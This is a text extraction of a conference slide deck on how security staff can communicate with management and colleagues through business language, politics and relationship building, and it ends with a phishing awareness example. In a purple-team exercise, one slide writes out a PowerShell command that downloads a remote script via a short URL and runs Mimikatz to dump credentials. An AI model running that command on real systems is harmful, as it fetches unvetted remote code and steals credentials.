The document discusses the challenges and importance of communication and influence within a security management context. It emphasizes the need for security professionals to speak the language of business, build relationships, and utilize soft skills to effectively convey security issues and gain support from stakeholders. The presenter shares personal experiences and strategies for improving communication and fostering collaboration across teams.

1. @haydnjohnson
Communication to
Upper Management
& Colleauges
The Art of Influence

2. @haydnjohnson
Whoami
Haydn Johnson
Security Manager| Purple Teamer
Points (points.com)
@haydnjohnson
Talks: Bsides, Circle City Con, SecTor, NolaCon
Kitty, Gym, BJJ
http://www.slideshare.net/HaydnJohnson

3. @haydnjohnson
Obligatory kitty photo!

4. @haydnjohnson
I work here!

5. @haydnjohnson
1.
Outline
give a summary of (something).

6. @haydnjohnson
Outline
❏ Why this talk
❏ Communication
Problem
❏ Politics
❏ Influence
❏ Relationship
Building
❏ Examples

7. @haydnjohnson
2.
How|Why This Talk
Some background

8. @haydnjohnson
A long time ago
Pentesting | Big 4 consulting

9. @haydnjohnson
Consulting vs Internal
1 2 3 4
?????
4 weeks
Forever

10. @haydnjohnson
What I do
Job Title: Security Manager
Responsibilities: Everything Security
Threat Intelligence Network Security
Security Program SDLC
Logging & Monitoring Employee
Security Awareness Web Security
Questions …...

11. @haydnjohnson
What I do
Number of direct reports : 0
ME

12. @haydnjohnson
Number of Security staff

13. @haydnjohnson
In Reality
OPs Team Windows Team
DBA Team Sysadmins

14. @haydnjohnson
I had to gain support from teams that had no
obligation to help.
❏ No goals
❏ Security responsibility only in my Job Description
In Short

15. @haydnjohnson

16. @haydnjohnson
Some Struggles

17. @haydnjohnson
Some Struggles
I’m not a silver bullet
❏ I don’t know everything
❏ Busy
❏ Not Seen as authority figure - initially
❏ Dev experience lacking

18. @haydnjohnson
Struggles
I'm not as technical as I thought
❏ Developers asking about websockets / encryption
“Let me do some investigation and get back to you ” /
Aka let me Google that
Was not sure where to start
❏ I wanted to do everything
❏ So many goals
❏ Taking on too much

19. @haydnjohnson
2.
Question Time
Audience Participation plzkthx

20. @haydnjohnson
Which is preferred
❏ Says hello every morning
❏ Asks how you are
❏ Remembers personal
information
❏ Ensures you understand
tasks
❏ Rushes straight to their
desk
❏ Does not ask questions
❏ Micromanges
❏ Flips you email of list
Can you work late tonight?

21. @haydnjohnson
Security has a Communication
Problem
❏ Management does not
care
❏ I told them X months ago
but didn’t listen
❏ Pentest was short
❏ It just does not work
that way
❏ What is the boss
thinking
❏ Thats not a pentest
I still struggle with these

22. @haydnjohnson
3.
Communication
Problem Example

23. @haydnjohnson
Security has a Communication
Problem
Pop Calc Example

24. @haydnjohnson
Kind of correct!
This is what an exec thinks
Security has a Communication
Problem

25. @haydnjohnson
Not paid
Not Fixed Sad Pandas
Consequences
Security has a Communication
Problem

26. @haydnjohnson
Security has a Communication
Problem
Leads to:
Not Aligned Frustration Running
around

27. @haydnjohnson
Kind of correct!
This is what an exec thinks
Security has a Communication
Problem

28. @haydnjohnson
What was not explained:
❏ Popping calcutor is an EXAMPLE of controlling
code
So what?
❏ Someone can control that computer
So what?
❏ Someone is in your network
❏ Access to Data
So what?
Security has a Communication
Problem

29. @haydnjohnson
What could be improved?

30. @haydnjohnson
Speak their language
❏ How does this impact them?
❏ Money
❏ Reputation
❏ Down time
❏ Fines
❏ Loss of customers
Benefits
❏ Executives understand
❏ Fixing happens
❏ Less frustration for all
Security has a Communication
Problem

31. @haydnjohnson
4.
Why is there a
Communication
Problem?
What’s a business

32. @haydnjohnson
“Different Context

33. @haydnjohnson

34. @haydnjohnson

35. @haydnjohnson

36. @haydnjohnson
Business Context
Big Wigs

37. @haydnjohnson
Business Context
Hacking

38. @haydnjohnson
Business Context
Profits

39. @haydnjohnson
Business Context
Magic ProfitExecutives

40. @haydnjohnson
Business Context
Security Costs Money

41. @haydnjohnson
Business Context
Security Costs Time & Effort

42. @haydnjohnson
Business Context
It Won ‘t Happen to Us

43. @haydnjohnson
Business Context
Basically

44. @haydnjohnson
So what can we do?

45. @haydnjohnson
Breaking the Status Quo
Security is seen as a
Cost
Need to show how
much a compromise
would cost
Security is time and
effort we don’t want
Amount of dollars to
protect $company
Legislation
Reputation
Won’t happen to us Statistics
News headlines
Assume Breach

46. @haydnjohnson
If Secuirty is seen in negative
ways
How do we fix this?

47. @haydnjohnson
How do we have an impact?
Politics
Influence

48. @haydnjohnson
Politics

49. @haydnjohnson
3.
Politics
Is just relationships

50. @haydnjohnson
“Your Organization is MUCH more
political than most of us realize.
https://www.manager-tools.com/2012/12/rules-politics-chapter-one
-count-your-votes

51. @haydnjohnson
“Non-rational decision Making
https://www.manager-tools.com/2012/12/rules-politics-chapter-one
-count-your-votes

52. @haydnjohnson
Politics
Think of it as Relationship Effects
“Professional Life is HUMAN life, and that means
it's emotional, and therefore political.”
https://www.manager-tools.com/2012/12/rules-politics-chapter-one
-count-your-votes

53. @haydnjohnson
Politics
Think of it as Relationship Effects
❏ In order to get what I want, I have to give them
what they want
❏ Give and take

54. @haydnjohnson
How can you ‘play’ politics
better?

55. @haydnjohnson
3.
Influence
A process for having an effect

56. @haydnjohnson
If someone influences someone else, they are
changing a person or thing in an indirect but
important way.
This way
What is Influence

57. @haydnjohnson
Big 4 Example

58. @haydnjohnson
Why Influence
❏ Reach Goals
❏ Effect change
❏ Having input that matters
❏ Being appreciated
❏ Necessary tool in organizational life

59. @haydnjohnson
Why Influence
What could that mean for me:
❏ The extra tool you
needed
❏ Career development
❏ Bigger project
❏ Exploitation
❏ Fixes approved
❏ Help from other
teams
❏ Time to tune tools
❏ Changing a process

60. @haydnjohnson
Why Influence
Most importantly
You are not doing this:

61. @haydnjohnson
How to Influence
❏ Speak Business Language
❏ Communicate in Risk, Dollars and cents
❏ Relationship Building

62. @haydnjohnson
How to Influence
Business Language
❏ Business Reputation
❏ Customer / Client Reputation
❏ Market and Strategy
❏ How do we stack against other companies
❏ Compliance
❏ Technology is not the driving force

63. @haydnjohnson
How to Influence
Metrics
❏ High, Medium, Low
❏ How long does it take to remediate?
❏ What are they rated on?

64. @haydnjohnson
How to Influence
Risks, dollars and cents
❏ What is the risk, so what?
❏ Dollar spent for each dollar protected
❏ Best practices

65. @haydnjohnson
How to Influence
Meetings
❏ Agenda / Description
❏ Prepare beforehand
❏ Start and finsh on time

66. @haydnjohnson
If you can't present. Your ideas
cant be heard
https://www.manager-tools.com/2012/12/rules-politics-chapter-one-count-your-vot
es

67. @haydnjohnson
3.
Relationship
Building over
“Zero Dayz”

68. @haydnjohnson

69. @haydnjohnson
Technical Skills are Fantastic
Your exploit code is amazing
Your detection algorithm is on point

70. @haydnjohnson
Relationship Building
Tech + Soft Skills == Career zero day
❏ Networking == more opportunities
What you do and know can reach more people

71. @haydnjohnson
What does it mean?
People Skills / Soft Skills
❏ Thinking outside the self
❏ Communicating clearly
❏ Empathy

72. @haydnjohnson
What does that really mean?
Influence
❏ How can I get the most out of this interaction to
benefit security?
❏ How can I speak in their language?
❏ What mood are they in?

73. @haydnjohnson

74. @haydnjohnson
Examples - Risk Register
Risk Register
❏ Why a Risk Register?
❏ What value will it add?
❏ Speak Business

75. @haydnjohnson
Examples - Risk Register
Risk Register
❏ To track risks, accountability
❏ Potential damage / cost / impact
❏ Metrics

76. @haydnjohnson
Examples - Risk Register
How did I approach
❏ Placing in Jira
I want to create this, that has a goal of...
How can you help me?
Is there a different way?

77. @haydnjohnson
Examples - Risk Register
The result
❏ A whole workflow created in a test environment
❏ People love to help if you look at them as the expert
❏ More than just what I wanted included
❏ Things included audibility and tracking
❏ Metrics for the business

78. @haydnjohnson
Examples - Mistakes
Admitting them
❏ Hard
❏ Necessary
❏ Cultivates a great environment

79. @haydnjohnson
What I find works

80. @haydnjohnson
Solutions that worked for me
Relationship Building
& Influence
❏ Not claiming the sky
is falling
❏ Transparency
❏ Listening for a
response
Why does it work?
❏ No boy who cried
wolf
❏ Integrity
❏ They will feel valued,
more likely to help

81. @haydnjohnson
Solutions that worked for me
Coffee with the CFO Example
❏ Present to CFO/CTO fortnightly
Fear usingFear
❏ Fear should not be the tool for security

82. @haydnjohnson
Solutions that worked for me
Security is not just code
❏ People
❏ Process
❏ Technology
Code is written by people. Code is pushed via a
process. Code is hosted on technology

83. @haydnjohnson
6.
Example exercise
Purple Team

84. @haydnjohnson
PowerShell Remoting
Mimikatz

85. @haydnjohnson
Credentials in Memory
Helpdesk / Ops wants a secure way to remotely
manage workstation(s).
RDP | VNC - no thanks
Want to use PowerShell Remoting because easier and
‘secure’
https://blog.netspi.com/powershell-remoting-cheatsheet/

86. @haydnjohnson
Credentials in Memory
Requirements
❏ Ease of use
❏ Secure
❏ Auditability
Research shows this is possible

87. @haydnjohnson
Credentials in Memory
Steps:
○ Before PS-Remoting ○ After PS-Remoting

88. @haydnjohnson
Credentials in Memory
❏ Need to know for sure
❏ Want to test credentials are safe
❏ See for self
Mimikatz comes in

89. @haydnjohnson
Credentials in Memory
Command Run:
powershell "IEX (New-Object
Net.WebClient).DownloadString('http://is.gd/oeoFuI');
Invoke-Mimikatz -DumpCreds | Out-File pre.txt”
http://carnal0wnage.attackresearch.com/2013/10/dumping-domains-worth-of-pa
sswords-with.html

90. @haydnjohnson
Credentials in Memory
Dumping credentials

91. @haydnjohnson
Credentials in Memory
Compare

92. @haydnjohnson
Credentials in Memory
Thumbs up success gift] / image

93. @haydnjohnson
Credentials in Memory
Success!
❏ Need to document
❏ Have justification to Implement!
❏ Security Gives sign off!

94. @haydnjohnson
Conclusion

95. @haydnjohnson
Top Takeaways
We are all in this together
Soft skills will take you far

96. @haydnjohnson
Mentoring

97. @haydnjohnson
Questions, Comments, Ask away

98. @haydnjohnson
Time Bonus

99. @haydnjohnson
Phishing Awareness Campaign
Not textbook execution
❏ Was not focused on click rate or credentials
❏ Exciting - allowed rumours to spread
❏ People talked about it with each other

100. @haydnjohnson
Phishing Awareness Campaign
Goals for $company
❏ Know to contact me for $security
❏ Have security at front of mind
❏ Understand phishing scams

101. @haydnjohnson
Phishing - sucks

102. @haydnjohnson
Awareness “Training”

103. @haydnjohnson
All the lolcats

104. @haydnjohnson
Everyone can be phished, even
me

105. @haydnjohnson
Phishing Awareness Campaign
Training was not training
❏ 30min awareness session
❏ Lolcats & jokes
❏ Graphs for team results

106. @haydnjohnson
Phishing Awareness Campaign
Visibility as Security
❏ Everyone knew my name
❏ People approached me with their story

107. @haydnjohnson
Phishing Awareness Campaign

108. @haydnjohnson
Top Takeaways
We are all in this together
Soft skills will take you far